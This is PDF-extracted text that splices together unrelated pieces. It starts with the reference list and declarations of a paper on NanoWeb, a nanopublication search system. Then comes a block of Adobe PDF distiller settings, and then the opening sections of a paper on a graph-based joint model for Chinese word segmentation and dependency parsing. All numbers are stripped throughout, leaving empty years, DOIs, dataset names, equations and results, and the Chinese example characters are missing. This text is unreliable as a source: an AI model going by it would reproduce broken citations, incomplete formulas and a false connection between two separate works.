fabris for the work on the citation of nanopublications and the development of some apis used in this work. additional information and declarations funding this work was supported by the computational data citation (cdc-stars) project of the university of padua, and by the examode project, as a part of the european union horizon program under grant . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european union horizon program: . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the authors declare that they have no competing interests. author contributions � fabio giachelle conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � dennis dosso performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � gianmaria silvello conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: source code is available at github: https://github.com/giachell/nanoweb. the indexed nanopublications are also publicly available here: http://app.tkuhn. eculture.labs.vu.nl/nanopub-monitor/. references agrawal s, chaudhuri s, das g. . dbxplorer: a system for keyword-based search over relational databases. in: proceedings of the th international conference on data engineering, icde . ieee computer society, – . amith m, tao c. . representing vaccine misinformation using ontologies. journal of biomedical semantics ( ): doi . /s - - - . arenas m, cuenca grau b, kharlamov e, marciuška s, zheleznyakov d. . faceted search over rdf-based knowledge graphs. journal of web semantics - : – doi . /j.websem. . . . balmin a, hristidis v, koudas n, papakonstantinou y, srivastava d, wang t. . a system for keyword proximity search on xml databases. in: proceedings of th international conference on very large data bases, vldb. morgan kaufmann, – . bast h, buchhold b, haussmann h. . semantic search on text and knowledge bases. foundations and trends in information retrieval ( – ): – doi . / . bhalotia g, hulgeri a, nakhe c, chakrabarti s, sudarshan s. . keyword searching and browsing in databases using banks. in: proceedings of the th international conference on data engineering. ieee computer society, – . biryukov m, groues v, satagopam v, schneider r. . biokb-text mining and semantic technologies for biomedical content discovery. available at https://biokb.lcsb.uni.lu/. bizer c, heath t, berners-lee t. . linked data—the story so far. international journal on semantic web and information systems ( ): – . borgman cl. . big data, little data, no data. cambridge: mit press. campregher c, honeder c, chung h, carethers jm, gasche c. . mesalazine reduces mutations in transforming growth factor β receptor ii and activin type ii receptor by improvement of replication fidelity in mononucleotide repeats. clinical cancer research ( ): – . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/giachell/nanoweb http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . / https://biokb.lcsb.uni.lu/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ carroll jj, bizer c, hayes p, stickler p. . named graphs, provenance and trust. in: proceedings of the th international conference on world wide web. acm press, – . carroll jj, stickler p. . rdf triples in xml. in: proc. of the www, conference (alternate track papers & posters). acm press, – . chapman a, simperl e, koesten l, konstantinidis g, ibáñez ld, kacprzak e, groth p. . dataset search: a survey. vldb journal ( ): – doi . /s - - -x. cheney j, chiticariu l, tan w. . provenance in databases: why, how, and where. foundations and trends in databases ( ): – doi . / . chichester c, gaudet p, karch o, groth pt, lane l, bairoch a, mons b, loizou a. . querying nextprot nanopublications and their value for insights on sequence variants and tissue expression. journal of web semantics : – doi . /j.websem. . . . chichester c, karch o, gaudet p, lane l, mons b, bairoch a. . converting nextprot into linked data and nanopublications. semantic web ( ): – doi . /sw- . coffman j, weaver ac. . an empirical performance evaluation of relational keyword search techniques. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . dosso d, silvello g. . search text to retrieve graphs: a scalable rdf keyword-based search system. ieee access : – doi . /access. . . elbassuoni s, blanco r. . keyword search over rdf graphsin: proc. of the th acm conference on information and knowledge management, cikm . new york: acm press, – . fabris e, kuhn t, silvello g. . a framework for citing nanopublications. in: doucet a, isaac a, golub k, aalberg t, jatowt a, eds. proc. of the rd international conference on theory and practice of digital libraries, tpdl , volume of lecture notes in computer science. berlin: springer, – . groth p, gibson a, velterop j. . the anatomy of a nanopublication. information services & use ( – ): – doi . /isu- - . hettne km, thompson m, van haagen h, van der horst e, kaliyaperumal r, mina e, tatum z, laros jfj, van mulligen em, schuemie m, aten e, li ts, bruskiewich r, good bm, su ai, kors ja, den dunnen j, van ommen gjb, roos m, ‘t hoen pa, mons b, schultes ea. . the implicitome: a resource for rationalizing gene-disease associations. plos one ( ): – . hey t, tansley s, tolle k. . the fourth paradigm: data-intensive scientific discovery. new york: microsoft research. kadilierakis g, fafalios p, papadakos p, tzitzikas y. . keyword search over rdf using document-centric information retrieval systems. in: the semantic web. cham: springer international publishing, – . kopliku a, pinel-sauvagnat k, boughanem m. . aggregated search: a new information retrieval paradigm. acm computing surveys (( ): )): – , doi . / . kuhn t, barbano pe, nagy ml, krauthammer m. . broadening the scope of nanopublications. in: proceedings of the semantic web: semantics and big data, th international conference, eswc , volume of lncs. berlin: springer, – . kuhn t, meroño-peñuela a, malic a, poelen jh, hurlbert ah, ortiz ec, furlong li, queralt- rosinach n, chichester c, banda jm, willighagen el, ehrhart f, evelo cta, malas tb, dumontier m. . nanopublications: a growing resource of provenance-centric scientific linked data. in: th ieee international conference on e-science, e-science . ieee computer society, – . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . / http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . /sw- http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /isu- - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kuhn t, willighagen e, evelo c, queralt-rosinach n, centeno e, furlong li. . reliable granular references to changing linked data. in: d’amato c, fernandez m, tamma v, lecue f, cudré-mauroux p, sequeda j, lange c, heflin j, eds. the semantic web—iswc . cham: springer international publishing, – . lopez-veyna ji, sosa vjs, lópez-arévalo i. . a virtual document approach for keyword search in databases. in: data. setúbal: scitepress, – . luo y, wang w, lin x, zhou x, wang j, li k. . spark : top-k keyword query in relational databases. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . mass y, sagiv y. . virtual documents and answer priors in keyword search over data graphs. in: proceeding of the workshops of the edbt/icdt, joint conference, volume of ceur workshop proceedings. mccusker jp, dumontier m, yan r, he s, dordick js, mcguinness dl. . finding melanoma drugs through a probabilistic knowledge graph. peerj computer science ( ):e doi . /peerj-cs. . mccusker j, rashid sm, agu n, bennett kp, mcguinness dl. . the whyis knowledge graph framework in action. in: proceeding of the iswc posters & demonstrations, industry and blue sky ideas tracks co-located with th international semantic web conference (iswc ), volume of ceur workshop proceedings. mons b, van haagen h, chichester c, hoen p-b, den dunnen jt, van ommen g, van mulligen e, singh b, hooft r, roos m, hammond j, kiesel b, giardine b, velterop j, groth p, schultes e. . the value of data. nature genetics ( ): – doi . /ng - . page r. . liberating links between datasets using lightweight data publishing: an example using plant names and the taxonomic literature. biodiversity data journal :e doi . /bdj. .e . piñero j, ramírez-anguita jm, saüch-pitarch j, ronzano f, centeno e, sanz f, furlong li. . the disgenet knowledge platform for disease genomics: update. nucleic acids research (d ):d –d . pontén f, jirström k, uhlen m. . the human protein atlas’a tool for pathology. journal of pathology ( ): – doi . /path. . pound j, mika p, zaragoza h. . ad-hoc object retrieval in the web of data. in: proceeding of the th international conference on world wide web, www . new york: acm press, – . pérez j, arenas m, gutierrez c. . semantics and complexity of sparql. acm transactions on database systems ( ): – . queralt-rosinach n, kuhn t, chichester c, dumontier m, sanz f, furlong li. . publishing disgenet as nanopublications. semantic web ( ): – doi . /sw- . rahman p, jiang l, nandi a. . evaluating interactive data systems. vldb journal ( ): – doi . /s - - - . robertson se, walker s, jones s, hancock-beaulieu mm, gatford m. . okapi at trec- . in: harman dk, ed. overview of the third text retrieval conference (trec- ). washington, d. c.: national institute of standards and technology, – . silvello g. . theory and practice of data citation. journal of the american society for information science and technology ( ): – . simitsis a, koutrika g, ioannidis ye. . précis: from unstructured keywords as queries to structured databases as answers. vldb journal ( ): – doi . /s - - - . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /ng - http://dx.doi.org/ . /bdj. .e http://dx.doi.org/ . /path. http://dx.doi.org/ . /sw- http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ slenter dn, kutmon m, hanspers k, riutta a, windsor j, nunes n, mélius j, cirillo e, coort sl, digles d, ehrhart f, giesbertz p, kalafati m, martens m, miller r, nishida k, rieswijk l, waagmeester a, eijssen lmt, evelo ct, pico ar, willighagen el. . wikipathways: a multifaceted pathway database bridging metabolomics to other omics research. nucleic acids research (d ):d –d doi . /nar/gkx . the economist. . the world’s most valuable resource is no longer oil, but data. available at https://www.economist.com/leaders/ / / /the-worlds-most-valuable-resource-is-no-longer- oil-but-data. uhlen m, zhang c, lee s, sjöstedt e, fagerberg l, bidkhori g, benfeitas r, arif m, liu z, edfors f, sanli k, von feilitzen k, oksvold p, lundberg e, hober s, nilsson p, mattsson j, schwenk jm, brunnström h, glimelius b, sjöblom t, edqvist p-h, djureinovic d, micke p, lindskog c, mardinoglu a, ponten f. . a pathology atlas of the human cancer transcriptome. science ( ):eaan doi . /science.aan . waagmeester a, kutmon m, riutta a, miller r, willighagen el, evelo ct, pico ar. . using the semantic web for rapid integration of wikipathways with other biological online data resources. plos computational biology ( ): – doi . /journal.pcbi. . wang h, aggarwal cc. . a survey of algorithms for keyword search on graph data. in: managing and mining graph data. berlin: springer, – . wu w. . proactive natural language search engine: tapping into structured data on the web. in: proceeding of the joint edbt/icdt conferences. new york: acm press, – . wynholds la, wallis jc, borgman cl, sands a, traweek s. . data, data use, and scientific inquiry: two case studies of data practices. in: proceeding th acm/ieee-cs joint conference on digital libraries (jcdl ). new york: acm press, – . yu jx, qin l, chang l. . keyword search in relational databases: a survey. ieee data engineering bulletin ( ): – . zhang h, he x, harrison t, bian j. . aero: an evidence-based semantic web knowledge base of cancer behavioral risk factors. in: proceeding of the th international workshop on semantics- powered data mining and analytics co-located with the th international semantic web conference (iswc ), volume of ceur workshop proceedings. – . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nar/gkx https://www.economist.com/leaders/ / / /the-worlds-most-valuable-resource-is-no-longer-oil-but-data https://www.economist.com/leaders/ / / /the-worlds-most-valuable-resource-is-no-longer-oil-but-data http://dx.doi.org/ . /science.aan http://dx.doi.org/ . /journal.pcbi. https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. search, access, and explore life science nanopublications on the web introduction background the nanoweb architecture nanopublication collection statistics nanoweb graphical user interface discussion on maintaining aspects conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice a graph-based model for joint chinese word segmentation and dependency parsing hang yan, xipeng qiu∗, xuanjing huang school of computer science, fudan university, china shanghai key laboratory of intelligent information processing, fudan university, china {hyan , xpqiu, xjhuang}@fudan.edu.cn abstract chinese word segmentation and dependency parsing are two fundamental tasks for chinese natural language processing. the dependency parsing is defined at the word-level. therefore word segmentation is the precondition of dependency parsing, which makes dependency parsing suffer from error propagation and unable to directly make use of character-level pre-trained language models (such as bert). in this paper, we propose a graph-based model to integrate chinese word segmentation and dependency parsing. different from previous transition-based joint models, our proposed model is more concise, which results in fewer efforts of feature engineering. our graph-based joint model achieves better performance than previous joint models and state-of-the-art results in both chinese word segmentation and dependency parsing. additionally, when bert is combined, our model can substan- tially reduce the performance gap of depen- dency parsing between joint models and gold-segmented word-based models. our code is publicly available at https://github. com/fastnlp/jointcwsparser. introduction unlike english, chinese sentences consist of continuous characters and lack obvious bound- aries between chinese words. words are usually regarded as the minimum semantic unit, there- fore chinese word segmentation (cws) becomes a preliminary pre-process step for downstream chinese natural language processing (nlp). for example, the fundamental nlp task, dependency ∗corresponding author. parsing, is usually defined at the word-level. to parse a chinese sentence, the process is usually performed in the following pipeline method: word segmentation, part-of-speech (pos) tagging, and dependency parsing. however, the pipeline method always suffers from the following limitations: ( ) error propagation. in the pipeline method, once some words are wrongly segmented, the subsequent pos tagging and parsing will also make mistakes. as a result, pipeline models achieve dependency scores of around ∼ % (kurita et al., ). ( ) knowledge sharing. these three tasks (word segmentation, pos tagging, and dependency parsing) are strongly related. the criterion of cws also depends on the word’s gram- matical role in a sentence. therefore, the knowledge learned from these three tasks can be shared. the knowledge of one task can help others. however, the pipeline method separately trains three models, each for a sin- gle task, and cannot fully exploit the shared knowledge among the three tasks. a traditional solution to this error propagation problem is to use joint models (hatori et al., ; zhang et al., ; kurita et al., ). these previous joint models mainly adopted a transition- based parsing framework to integrate the word seg- mentation, pos tagging, and dependency parsing. based on standard sequential shift-reduce transi- tions, they design some extra actions for word segmentation and pos tagging. although these joint models achieved better performance than the pipeline model, they still suffer from two limitations: ( ) the first is the huge search space. com- pared with word-level transition parsing, transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: yue zhang. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/fastnlp/jointcwsparser https://github.com/fastnlp/jointcwsparser https://doi.org/ . /tacl_a_ character-level transition parsing has longer sequence of actions. the search space is huge. therefore, it is hard to find the best transition sequence exactly. usually, approx- imate strategies like greedy search or beam search are adopted in practice. however, approximate strategies do not, in general, produce an optimal solution. although exact searching is possible within o(n ) complex- ity (shi et al., ), due to their complexity, these models just focus on unlabeled depen- dency parsing, rather than labeled depen- dency parsing. ( ) the second is the feature engineering. these transition-based joint models rely on a de- tailed handcrafted feature. although kurita et al. ( ) introduced neural models to reduce partial efforts of feature engineering, they still require hard work on how to design and compose the word-based features from the stack and the character-based features from the buffer. recently, graph-based models have made signif- icant progress for dependency parsing (kiperwasser and goldberg, ; dozat and manning, ), which fully exploit the ability of the bidirec- tional long short-term memory network (bilstm) (hochreiter and schmidhuber, ) and attention mechanism (bahdanau et al., ) to capture the interactions of words in a sentence. different from the transition-based models, the graph-based mod- els assign a score or probability to each possible arc and then construct a maximum spanning tree from these weighted arcs. in this paper, we propose a joint model for cws and dependency parsing that integrates these two tasks into a unified graph-based parsing frame- work. because the segmentation is a character- level task and dependency parsing is a word-level task, we first formulate these two tasks into a character-level graph-based parsing framework. in detail, our model contains ( ) a deep neural network encoder, which can capture the long- term contextual features for each character— it can be a multi-layer bilstm or pre-trained bert, ( ) a biaffine attentional scorer (dozat and manning, ), which unifies segmentation and dependency relations at the character level. besides, unlike the previous joint models (hatori et al., ; zhang et al., ; kurita et al., ), our joint model does not depend on the pos tagging task. in experiments on three popular datasets, we obtain state-of-the-art performance on cws and dependency parsing. in this paper, we claim four contributions: • to the best of our knowledge, this is the first graph-based method to integrate cws and dependency parsing both in the training phase and the decoding phase. the proposed model is very concise and easily implemented. • compared with the previous transition-based joint models, our proposed model is a graph- based model, which results in fewer efforts of feature engineering. additionally, our model can deal with the labeled dependency parsing task, which is not easy for transition-based joint models. • in experiments on datasets ctb- , ctb- , and ctb- , our model achieves state-of- the-art score in joint cws and dependency parsing, even without the pos information. • as an added bonus, our proposed model can directly utilize the pre-trained language model bert (devlin et al., ) to boost perfor- mance significantly. the performance of many nlp tasks can be significantly enhanced when bert was combined (sun et al., ; zhong et al., ). however, for chinese, bert is based on chinese characters, whereas de- pendency parsing is conducted in the word- level. we cannot directly utilize bert to enhance the word-level chinese dependency parsing models. nevertheless, by using the our proposed model, we can exploit bert to implement cws and dependency parsing jointly. related work to reduce the problem of error propagation and improve the low-level tasks by incorporating the knowledge from the high-level tasks, many suc- cessful joint methods have been proposed to simultaneously solve related tasks, which can be categorized into three types. . joint segmentation and pos tagging because segmentation is a character-level task and pos tagging is a word-level task, an intuitive idea downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april is to transfer both the tasks into character-level and incorporate them in a uniform framework. a popular method is to assign a cross-tag to each character (ng and low, ). the cross- tag is composed of a word boundary part and a pos part, for example, ‘‘b-nn’’ refers to the first character in a word with pos tag ‘‘nn’’. thus, the joint cws and pos tagging can be regarded as a sequence labeling problem. following this work, zheng et al. ( ), chen et al. ( ), and shao et al. ( ) utilized neural models to alleviate the efforts of feature engineering. another line of the joint segmentation and pos tagging method is the transition-based method (zhang and clark, , ), in which the joint decoding process is regarded as a sequence of action predictions. zhang et al. ( ) used a simple yet effective sequence-to-sequence neu- ral model to improve the performance of the transition-based method. . joint pos tagging and dependency parsing because the pos tagging task and dependency parsing task are word-level tasks, it is more natural to combine them into a joint model. hatori et al. ( ) proposed a transition-based joint pos tagging and dependency parsing model and showed that the joint approach improved the accuracies of these two tasks. yang et al. ( ) extended this model by neural models to alleviate the efforts of feature engineering. li et al. ( ) utilized the graph-based model to jointly optimize pos tagging and dependency parsing in a unique model. they also proposed an effective pos tag pruning method that could greatly improve the decoding efficiency. by combining the lexicality and syntax into a unified framework, joining pos tagging and dependency parsing can improve both tagging and parsing performance over independent modeling significantly. . joint segmentation, pos tagging, and dependency parsing compared with the above two kinds of joint tasks, it is non-trivial to incorporate all the three tasks into a joint model. hatori et al. ( ) first proposed a transition- based joint model for cws, pos tagging, and dependency parsing, which stated that dependency information improved the performances of word segmentation and pos tagging. zhang et al. ( ) expanded this work by using intra-character struc- tures of words and found the intra-character de- pendencies were helpful in word segmentation and pos tagging. zhang et al. ( ) proposed joint segmentation, pos tagging, and dependency re-ranking system. this system required a base parser to generate some candidate parsing results. kurita et al. ( ) followed the work of hatori et al. ( ); zhang et al. ( ) and used the bilstm to extract features with n-gram character string embeddings as input. a related work is the full character-level neural dependency parser (li et al., ), but it focuses on character-level parsing without considering the word segmentation and word-level pos tagging and parsing. although a heuristic method could transform the character-level parsing results to word-level, the transform strategy is tedious and the result is also worse than other joint models. besides, there are some joint models for constit- uency parsing. qian and liu ( ) proposed a joint inference model for word segmentation, pos tagging, and constituency parsing. however, their model did not train three tasks jointly and suffered from the decoding complexity due to the large combined search space. wang et al. ( ) first segmented a chinese sentence into a word lattice, and then predicted the pos tags and parsed tree based on the word lattice. a dual decomposition method was used to encourage the tagger and parser to predict agreed structures. the above methods show that syntactic parsing can provide useful feedback to word segmentation and pos tagging and the joint inference leads to improvements in all three sub-tasks. moreover, there is no related work on joint chinese word segmentation and dependency parsing, without pos tagging. proposed model previous joint methods are mainly based on the transition-based model, which modifies the stan- dard ‘‘shift-reduce’’ operations by adding some extra operations, such as ‘‘app’’ and ‘‘tag’’. dif- ferent from previous methods, we integrate word segmentation and dependency parsing into a graph-based parsing framework, which is simpler and easily implemented. first, we transform the word segmentation to a special arc prediction problem. for example, downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : the unified framework for joint cws and dependency parsing. the green arc indicates the word-level dependency relation. the dashed blue arc with ‘‘app’’ indicates its connected characters belong to a word. a chinese word ‘‘ (financial sec- tor)’’ has two intra-word dependent arcs: ‘‘ ← ’’ and ‘‘ ← ’’. both intra-word de- pendent arcs have the label ‘‘app’’. in this work, all characters in a word (excluding the last character) depend on their latter character, as the ‘‘ (financial sector)’’ in figure . a character-based dependency parsing arc has also been used in hatori et al. ( ) and zhang et al. ( ), but their models were transition-based. second, we transform the word-level depen- dency arcs to character-level dependency arcs. assuming that there is a dependency arc between words w = xi:j and w = xu:v, where xi:j denotes the continuous characters from i to j in a sentence, we make this arc to connect the last characters xj and xv of each word. for example, the arc ‘‘ (develop)→ (financial sector)’’ is translated to ‘‘ → ’’. figure illustrates the framework for joint cws and dependency parsing. thus, we can use a graph-based parsing model to conduct these two tasks. our model contains two main components: ( ) a deep neural network encoder to extract the contextual features, which converts discrete characters into dense vectors, and ( ) a biaffine attentional scorer (dozat and manning, ), which takes the hidden vectors for the given character pair as input and predicts a label score vector. figure illustrates the model structure for joint cws and dependency parsing. the detailed description is as follows. . encoding layer the encoding layer is responsible for converting discrete characters into contextualized dense rep- figure : proposed joint model when the encoder layer is bilstm. for simplicity, we omit the predic- tion of the arc label, which uses a different biaffine classifier. resentations. in this paper, we tried two different kinds of encode layers. the first one is multi- layer bilstm, the second one is the pre-trained language model bert (devlin et al., ) which is based on self-attention. . . bilstm-based encoding layer given a character sequence x = {x , . . . , xn}, in neural models, the first step is to map discrete language symbols into distributed embedding space. formally, each character xi is mapped as ei ∈ rde ⊂ e, where de is a hyper-parameter indicating the size of character embedding, and e is the embedding matrix. character bigrams and trigrams have been shown highly effective for cws and pos tagging in previous studies (pei et al., ; chen et al., ; shao et al., ; zhang et al., ). following their settings, we combine the character bigram and trigram to enhance the representation of each character. the downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april final character representation of xi is given by ei = exi ⊕ exixi+ ⊕ exixi+ xi+ , where e denotes the embedding for unigram, bigram, and trigram, and ⊕ is the concatenation operator. to capture the long-term contextual informa- tion, we use a deep bilstm (hochreiter and schmidhuber, ) to incorporate information from both sides of a sequence, which is a preva- lent choice in recent research for nlp tasks. the hidden state of lstm for the i-th character is hi = bilstm(ei, −→ h i− , ←− hi+ , θ), ( ) where −→ h i and ←− hi are the hidden states at posi- tion i of the forward and backward lstms re- spectively, and θ denotes all the parameters in the bilstm layer. . . bert-based encoding layer other than using bilstm as the encoder layer, pre-trained bert can also been used as the encoding layer (devlin et al., ; cui et al., ). the input of bert is the character sequence x = {x , . . . , xn}, the output of the last layer of bert is used as the representation of characters. more details on the structure of bert can be found in devlin et al. ( ). . biaffine layer to predict the relations of each character pair, we use the biaffine attention mechanism (dozat and manning, ) to score their probability on the top of encoding layers. according to dozat and manning ( ), biaffine attention is more effectively capable of measuring the relationship between two elementary units. . . unlabeled arc prediction for the pair of the i-th and j-th characters, we first take the output of the encoding layer hi and hj, then feed them into an extension of bi- linear transformation called a biaffine function to obtain the score for an arc from xi (head) to xj (dependent). r (arc−head) i = mlp (arc−head)(hi), ( ) r (arc−dep) j = mlp (arc−dep)(hj), ( ) s (arc) ij = r (arc−head) i u (arc)r (arc−dep) j +r (arc−head)t i u (arc), ( ) where mlp is a multi-layer perceptron. a weight matrix u(arc) determines the strength of a link from xi to xj while u(arc) is used in the bias term, which controls the prior headedness of xi. thus, s(arc)j = [s (arc) j ; · · · ; s (arc) tj ] is the scores of the potential heads of the j-th character, then a softmax function is applied to obtain the probability distribution. in the training phase, we minimize the cross- entropy of golden head-dependent pair. in the test phase, we ensure that the resulting parse is a well- formed tree by the heuristics formulated in dozat and manning ( ). . . arc label prediction after obtaining the best predicted unlabeled tree, we assign the label scores s(label)ij ∈ rk for every arc xi → xj, in which the k-th element cor- responds to the score of k-th label and k is the size of the label set. in our joint model, the arc label set consists of the standard word-level dependency labels and a special label ‘‘app’’ indicating the intra-dependency within a word. for the arc xi → xj , we obtain s(label)ij with r (label−head) i = mlp (label−head)(hi), ( ) r (label−dep) j = mlp (label−dep)(hj), ( ) r (label) ij = r (label−head) i ⊕ r (label−dep) j , ( ) s (label) ij = r (label−head) i u(label)r (label−dep) j + w (label)(r (label) ij ) + u (label), ( ) where u(label) ∈ rk×p×p is a third-order tensor, w (label) ∈ rk× p is a weight matrix, and u(label) ∈ rk is a bias vector. the best label of arc xi → xj is determined according to s(label)ij . yij = arg max label s (label) ij ( ) in the training phase, we use golden head- dependent relations and cross-entropy to optimize arc label prediction. characters with continuous ‘‘app’’ arcs can be combined into a single word. if a character has no leftward ‘‘app’’ arc, it is a single-character word. the arc with label ‘‘app’’ is constrained to occur in two adjacent characters and is leftward. when decoding, we first use the proposed model to predict the character-level labeled dependency tree, and then recover the word segmentation and word-level dependency downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : label prediction for word segmentation only. the arc with ‘‘app’’ indicates its connected characters belong to a word, and the arc with ‘‘seg’’ indicates its connected characters belong to different words. 